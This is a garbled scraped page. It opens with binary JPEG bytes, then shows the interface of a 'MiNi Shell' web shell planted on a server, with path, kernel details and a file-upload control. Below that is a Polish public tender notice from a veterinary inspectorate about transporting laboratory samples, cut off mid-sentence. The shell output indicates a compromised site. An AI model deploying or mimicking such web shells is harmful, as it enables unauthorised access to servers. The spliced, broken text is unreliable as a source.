JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220210/0005285801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz prób do badań laboratoryjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI INSPEKTORAT WETERYNARII</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000093177</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Botaniczna 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-306</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 453 73 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">65 453 73 01</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zielonagora.wiw@wet.zgora.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wet.zgora.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> działalność administracji publicznej w zakresie bezpieczeństwa żywności, pasz, utylizacji, nadzoru farmaceutycznego, bezpieczeństwa i ochrony zdrowia zwierząt oraz w zakresie wykonywania badań lab. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz prób do badań laboratoryjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-805df838-897a-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00052858</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00032141/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przewóz prób do badań laboratoryjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.wet.zgora.pl/zamowienia_publiczne/17/status/5/rodzaj/wzp/zwr/0/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.wet.zgora.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje ogólne<br/>1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu:<br/>a) miniPortalu, dostępnego pod adresem: https://miniportal.uzp.gov.pl/<br/>b) ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz<br/>c) poczty elektronicznej.<br/>2) Osoby wskazane do porozumiewania się z Wykonawcami:<br/>Dagmara Laska, email: d.laska@wet.zgora.pl<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy:<br/>a) „Formularz do złożenia, zmiany, wycofania oferty lub wniosku’’ oraz<br/>b) „Formularz do komunikacji”.<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku’’ i „Formularza do komunikacji” wynosi 150 MB.<br/>4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>5. Zamawiający przekazuje link do postępowania oraz ID postępowania w załączniku nr 10 do SWZ.<br/>Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców’’ lub ze strony głównej z zakładki Postępowania.<br/>6. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert i wniosków).<br/>1) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularza do<br/>komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia BZP lub ID postępowania.<br/>2) Zamawiający może również komunikować się z Wykonawcami za pomocą pocztę elektronicznej, email: zielonagora.wiw@wet.zgora.pl lub d.laska@wet.zgora.pl<br/>3) Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w pkt 2 adres email. Sposób<br/>sporządzania dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzaniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcę (Dz. U. z 2020 poz.2415).<br/>4) Wykonawca powinien swój adres poczty elektronicznej wskazać w ofercie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku nr 9 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIW.DG.272.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odbiór prób z pięciu powiatów:<br/>1) Powiatowego Inspektoratu Weterynarii w Nowej Soli, ul. Kossaka 24, 67-100 Nowa Sól;<br/>2) Powiatowego Inspektoratu Weterynarii w Żaganiu, ul. Szprotawska 30B, 68-100 Żagań;<br/>3) Powiatowego Inspektoratu Weterynarii w Żarach z siedzibą w Lubsku, ul. Wrocławska 54,68-300 Lubsko;<br/>4) Powiatowego Inspektoratu Weterynarii we Wschowie, ul. Kazimierza Wielkiego 4, 67-400 Wschowa;<br/>5) Powiatowego Inspektoratu Weterynarii w Krośnie Odrzańskim, ul. Chopina 1, 66--600 Krosno Odrzańskie<br/>i dostarczania ich bezpośrednio do Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej, Pracowni Badań Serologicznych ul. Browarna 6, 65- 849 Zielona Góra. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. W części nr 1: usługa odbioru prób do badań laboratoryjnych z następujących punktów: PIW Nowa Sól, PIW Żagań, PIW Żary z siedzibą w Lubsku, PIW Wschowa, PIW Krosno Odrzańskie i usługa przewozu ich bezpośrednio do Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej, Pracowni Badań Serologicznych ul. Browarna 6, 65- 849 Zielona Góra.<br/>1) Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriów:<br/>a) Cena oferty brutto – K1<br/>b) Rok produkcji pojazdu przewidzianego do świadczenia usługi – K2<br/>c) Maksymalny czas podstawienia zastępczego środka przewozu– K3<br/>2) Powyższym kryteriom Zamawiający przypisał następujące znaczenia oraz sposób oceny:<br/>Kryterium Waga (%) Maksymalna liczba punktów Sposób oceny metoda punktowa wg wzoru<br/>K1- Cena brutto oferty 60% 60,00<br/>K1 = cena najniższa ze wszystkich ofert/cena oferty badanejx100pkt x60%<br/>K2 – Rok produkcji pojazdu przewidzianego do świadczenia usługi 30 % 30,00 K2= suma punktów otrzymanych za rok produkcji środka transportu (zgodnie z wykazem poniżej)/ liczba pojazdów (sztuk)<br/>K2 - Wykonawca otrzyma następującą liczbę punktów za rok produkcji środka przewozu:<br/>• 2011 i niżej otrzyma 0 pkt<br/>• 2012 otrzyma 5 pkt<br/>• 2013 otrzyma 10 pkt<br/>• 2014 do 2015 otrzyma 15 pkt<br/>• 2016 do 2017 otrzyma 20 pkt<br/>• 2018 do 2019 otrzyma 25 pkt<br/>• 2020 i nowsze otrzyma 30 pkt<br/>Niewskazanie roku produkcji środka przewozu przez Wykonawcę w formularzu ofertowym skutkuje odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako niezgodnej z warunkami zamówienia.<br/>Uwaga: Zamawiający zastrzega, że brak jest możliwości samowolnej zmiany pojazdu. Wskazane pojazdy do realizacji zamówienia będą musiały być wykorzystywane przez Wykonawcę. Zmiana środka przewozu w trakcie trwania usługi może nastąpić w przypadku sprzedaży pojazdu, uszkodzenia lub długotrwałej niesprawności. Zamawiający dopuszcza wykazanie się pojazdem podmiotu trzeciego.<br/>K3 – Maksymalny czas podstawienia zastępczego środka przewozu 10 % 10,00 <br/>K3- Wykonawca otrzyma następującą liczbę punktów za czas podstawienia zastępczego środka przewozu liczony od momentu wystąpienia awarii i powiadomienia przedstawiciela Zamawiającego:<br/>• Do 4,0 godzin otrzyma 0 pkt<br/>• Do 3,0 godzin otrzyma 5 pkt<br/>• Do 2,0 godzin otrzyma 10 pkt<br/>Czas podstawienia zastępczego środka przewozu należy podać w pełnych godzinach. Jeżeli Wykonawca poda czas reakcji w minutach Zamawiający dokona przeliczenia na godziny i zaokrągli do pełnych godzin (w górę) (np. 210 min/60 min = 3,5 h, co daje rozpoczętą godzinę i wynosi 4,0h). Przy<br/>zaoferowaniu terminu dłuższego niż 4,0 h, bądź niewpisania czasu podstawienia środka zastępczego skutkuje odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>RAZEM 100% 100,00<br/>3) Całkowita liczba punktów jaką otrzyma oferta zostanie obliczona wg poniższego wzoru: K=K1 + K2 +K3, gdzie:<br/>K – całkowita liczba punktów<br/>K1 – punkty uzyskane w kryterium <br/>K1 – „cena brutto oferty”<br/>K2 – punkty uzyskane w kryterium <br/>K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>K3 – punkty uzyskane w kategorii <br/>K3 – „maksymalny czas podstawienia zastępczego środka przewozu”<br/>4) Ocena punktowa w kryterium <br/>K1 – „cena brutto oferty” zostanie dokonana na podstawie łącznej<br/>ceny ofertowej brutto wskazanej przez Wykonawcę w formularzu ofertowym, przeliczona zostanie według wzoru opisanego w tabeli powyżej.<br/>5) Ocena punktowa w kryterium <br/>K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli.<br/>6) Ocena punktowa w kryterium <br/>K3 – „maksymalny czas podstawienia zastępczego środka przewozu”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji pojazdu przewidzianego do świadczenia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Maksymalny czas podstawienia zastępczego środka przewozu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odbiór prób z Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze – Zakładu Higieny Weterynaryjnej, Pracowni Badań Serologicznych ul. Browarna 6, 65- 849 Zielona Góra i dostarczenia ich do punktów:<br/>1) Zakładu Higieny Weterynaryjnej im. prof. Kazimierza Panka w Bydgoszczy Oddział Terenowy we Włocławku, ul. Planty 18, 87-800 Włocławek;<br/>2) Państwowego Instytutu Weterynaryjnego - Państwowego Instytutu Badawczego, Aleja Partyzantów 57, 24-100 Puławy;<br/>3) Zakładu Higieny Weterynaryjnej Poznań, ul. Grunwaldzka 250, 60-166 Poznań,<br/>Zakładu Higieny Weterynaryjnej Leszno, ul. Święciechowska 150, 64-100 Leszno,<br/>Zakładu Higieny Weterynaryjnej Wrocław, ul. Januszowicka 48, 53-135 Wrocław. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja.<br/>1) Przedmiot zamówienia określa zakres podstawowy oraz zakres opcjonalny związany z przewozem prób do badań laboratoryjnych, którego wykorzystanie zależne jest od możliwości finansowych Zamawiającego. Szczegóły znajdują się w projektowanych postanowieniach umowy stanowiących załącznik nr 7 do SWZ.<br/>2) W Opisie przedmiotu zamówienia stanowiącym załącznik nr 1 do SWZ został wskazany „zakres podstawowy” i „zakres opcji”. Opcją jest zakup dodatkowej usługi przewozu prób, w terminie trwania umowy, w cenach jednostkowych określonych w formularzu ofertowym, stanowiącym załącznik nr 2 do SWZ.<br/>3) Zamawiający uprawniony jest do skorzystania z prawa opcji w terminie obowiązywania umowy.<br/>5. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru określają:<br/>1) opis przedmiotu zamówienia – załącznik nr 1 do SWZ,<br/>2) projektowane postanowienia umowy – załącznik nr 7 do SWZ.<br/>6. Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226<br/>ust. 1 pkt 5 ustawy Pzp. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W części nr 2 - usługa odbioru prób do badań laboratoryjnych z Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej, Pracowni Badań Serologicznych ul. Browarna 6, 65- 849 Zielona Góra i usługa przewozu do następujących punktów: ZHW Włocławek, PIWet Puławy, ZHW Poznań – ZHW Leszno – ZHW Wrocław.<br/>1) Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriów:<br/>a) Cena oferty brutto – K1<br/>b) Rok produkcji pojazdu przewidzianego do świadczenia usługi – K2<br/>c) Maksymalny czas podstawienia zastępczego środka przewozu – K3<br/>2) Powyższym kryteriom Zamawiający przypisał następujące znaczenia oraz sposób oceny:<br/>Kryterium Waga (%) Maksymalna liczba punktów Sposób oceny metoda punktowa wg wzoru<br/>K1- Cena brutto oferty 60% 60,00<br/>K1 = cena najniższa ze wszystkich ofert/cena oferty badanejx100pkt x60%<br/>K2 – Rok produkcji pojazdu przewidzianego do świadczenia usługi 30 % 30,00 K2=suma punktów otrzymanych za rok produkcji środka transportu (zgodnie z wykazem poniżej) / liczba pojazdów (sztuk)<br/>K2 – Wykonawca otrzyma następującą liczbę punktów za rok produkcji środka przewozu:<br/>• 2011 i niżej otrzyma 0 pkt<br/>• 2012 otrzyma 5 pkt<br/>• 2013 otrzyma 10 pkt<br/>• 2014 do 2015 otrzyma 15 pkt<br/>• 2016 do 2017 otrzyma 20 pkt<br/>• 2018 do 2019 otrzyma 25 pkt<br/>• 2020 i nowsze otrzyma 30 pkt<br/>Niewskazanie roku produkcji środka przewozu przez Wykonawcę w formularzu ofertowym skutkuje odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp jako niezgodnej z warunkami zamówienia.<br/>Uwaga: Zamawiający zastrzega, że brak jest możliwości samowolnej zmiany pojazdu. Wskazane pojazdy do realizacji zamówienia będą musiały być wykorzystywane przez Wykonawcę. Zmiana środka przewozu w trakcie trwania usługi może nastąpić w przypadku sprzedaży pojazdu, uszkodzenia lub długotrwałej niesprawności. Zamawiający dopuszcza wykazanie się pojazdem podmiotu trzeciego.<br/>K3 – Maksymalny czas podstawienia zastępczego środka przewozu 10 % 10,00 K3- Wykonawca<br/>otrzyma następującą liczbę punktów za czas podstawienia zastępczego środka przewozu liczony od momentu wystąpienia awarii i powiadomienia przedstawiciela Zamawiającego:<br/>• Do 4,0 godzin otrzyma 0 pkt<br/>• Do 3,0 godzin otrzyma 5 pkt<br/>• Do 2,0 godzin otrzyma 10 pkt<br/>Czas podstawienia zastępczego środka przewozu należy podać w pełnych godzinach. Jeżeli Wykonawca poda czas reakcji w minutach Zamawiający dokona przeliczenia na godziny i zaokrągli do pełnych godzin (w górę) (np. 210 min/60 min = 3,5 h, co daje rozpoczętą godzinę i wynosi 4,0h). Przy<br/>zaoferowaniu terminu dłuższego niż 4,0 h, bądź niewpisania czasu podstawienia środka zastępczego skutkuje 